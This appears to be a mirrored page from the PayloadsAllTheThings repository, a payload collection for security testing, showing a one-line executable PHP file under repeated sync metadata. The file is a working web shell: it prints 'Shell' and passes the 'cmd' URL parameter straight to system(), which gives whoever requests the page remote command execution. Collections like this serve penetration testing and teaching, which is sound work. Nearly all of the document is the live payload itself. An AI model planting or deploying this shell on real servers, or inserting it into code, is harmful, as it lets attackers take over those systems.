mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-03-01 06:53:04 -08:00
1 line
43 B
PHP
Executable File
1 line
43 B
PHP
Executable File
<?php echo "Shell";system($_GET['cmd']); ?>
|